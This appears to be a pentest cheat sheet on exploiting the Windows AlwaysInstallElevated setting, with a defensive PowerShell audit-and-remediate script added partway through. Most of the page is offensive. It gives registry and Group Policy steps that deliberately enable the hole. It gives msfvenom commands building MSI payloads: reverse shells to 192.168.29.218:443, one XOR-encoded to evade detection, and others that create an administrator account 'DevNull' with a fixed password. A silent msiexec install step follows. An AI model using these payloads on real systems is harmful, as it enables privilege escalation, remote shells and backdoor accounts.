AlwaysInstallElevated Exploitation

If both the HKCU (Current User) and HKLM (Local Machine) registry keys are set to 0x1, Windows allows MSI files to be installed with SYSTEM privileges, leading to local privilege escalation. The value must be set in both hives; setting only one of them does not enable elevated installs.


Check vulnerability status (the value name is AlwaysInstallElevated)

reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Set the key (if you have permission)

reg add HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 /f
reg add HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 /f
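To audit both hives in one step and remediate when the exploitable combination is present, here is an added PowerShell example that is not part of the original page; the function names are its own, and it assumes the HKCU: and HKLM: provider drives are available (the default in Windows PowerShell):

```powershell
# Added example, not from the original page. Reads both AlwaysInstallElevated
# values, reports whether the privilege-escalation condition (both = 1) exists,
# and offers a remediation that sets both back to 0.
$InstallerPolicyPath = 'Software\Policies\Microsoft\Windows\Installer'
$ValueName           = 'AlwaysInstallElevated'

function Get-AlwaysInstallElevatedValue {
    param([ValidateSet('HKCU', 'HKLM')][string]$Hive)
    $key = "${Hive}:\$InstallerPolicyPath"
    # A missing key or value means the policy is Not Configured, which is the
    # secure default, so treat it as 0 rather than as an error.
    $item = Get-ItemProperty -Path $key -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.$ValueName
}

function Test-AlwaysInstallElevated {
    $hkcu = Get-AlwaysInstallElevatedValue -Hive 'HKCU'
    $hklm = Get-AlwaysInstallElevatedValue -Hive 'HKLM'
    [pscustomobject]@{
        HKCU       = $hkcu
        HKLM       = $hklm
        # Windows Installer only runs packages as SYSTEM when BOTH values are 1;
        # a single hive set to 1 is a misconfiguration but not yet exploitable.
        Vulnerable = ($hkcu -eq 1 -and $hklm -eq 1)
    }
}

function Disable-AlwaysInstallElevated {
    # Writing HKLM requires an elevated session; HKCU can be fixed by the user.
    foreach ($hive in 'HKCU', 'HKLM') {
        $key = "${hive}:\$InstallerPolicyPath"
        if (Test-Path $key) {
            Set-ItemProperty -Path $key -Name $ValueName -Value 0 -Type DWord
        }
    }
}

$result = Test-AlwaysInstallElevated
$result | Format-List
if ($result.Vulnerable) {
    Write-Warning 'Both hives have AlwaysInstallElevated=1: any user-installed MSI runs as SYSTEM.'
    # Uncomment to remediate (needs admin for the HKLM write):
    # Disable-AlwaysInstallElevated
}
```

If Group Policy is what set the values, clearing the registry directly is only temporary: the next policy refresh rewrites them, so the policy itself has to be set to Disabled or Not Configured.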

Group Policy Configuration for AlwaysInstallElevated

The AlwaysInstallElevated setting can also be enabled through the Group Policy Editor (gpedit.msc). When it is enabled in both the Computer Configuration and the User Configuration, .msi files are installed with elevated SYSTEM privileges, which can be exploited for local privilege escalation.

Enable Policy in Computer Configuration

Navigate to the following path:

Local Computer Policy > 
    Computer Configuration > 
        Administrative Templates > 
            Windows Components > 
                Windows Installer > 
                    Always install with elevated privileges.
  • Set this policy to Enabled


Enable Policy in User Configuration

Local Computer Policy > 
    User Configuration > 
        Administrative Templates > 
            Windows Components > 
                Windows Installer > 
                    Always install with elevated privileges.
  • Set this policy to Enabled

Apply the policy change immediately:

gpupdate /force

msfvenom Payload Generation for AlwaysInstallElevated Exploitation

Reverse Shell Payload (Platform: windows / Architecture: x64)

  • Basic reverse shell payload as MSI

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.29.218 LPORT=443 -f msi -o setup.msi

  • XOR-encoded reverse shell, executed via MSI (the x64/xor encoder requires the x64 payload variant)

msfvenom --platform windows --arch x64 --payload windows/x64/shell/reverse_tcp LHOST=192.168.29.218 LPORT=443 --encoder x64/xor --iterations 9 -f msi --out AlwaysInstallElevated.msi

Command Execution Payload (Run Local Commands)

  • Add user 'test' to the local Administrators group

msfvenom -p windows/exec CMD='net localgroup administrators test /add' -f msi -o setup.msi

  • Create a new user 'DevNull' with the password 'Password@123'

msfvenom -p windows/exec CMD='net user DevNull Password@123 /add' -f msi -o setup.msi

  • Add the existing user 'DevNull' to the Administrators group

msfvenom -p windows/exec CMD='net localgroup administrators DevNull /add' -f msi -o setup.msi

  • Install the MSI package from the command prompt

msiexec /quiet /qn /i update.msi
Option    Meaning
msiexec   Windows Installer command line tool
/i        Specifies the MSI file to install (in this case update.msi)
/quiet    Runs the installer with no user interface (fully silent)
/qn       Equivalent to /quiet; explicitly sets the UI level to "no UI"
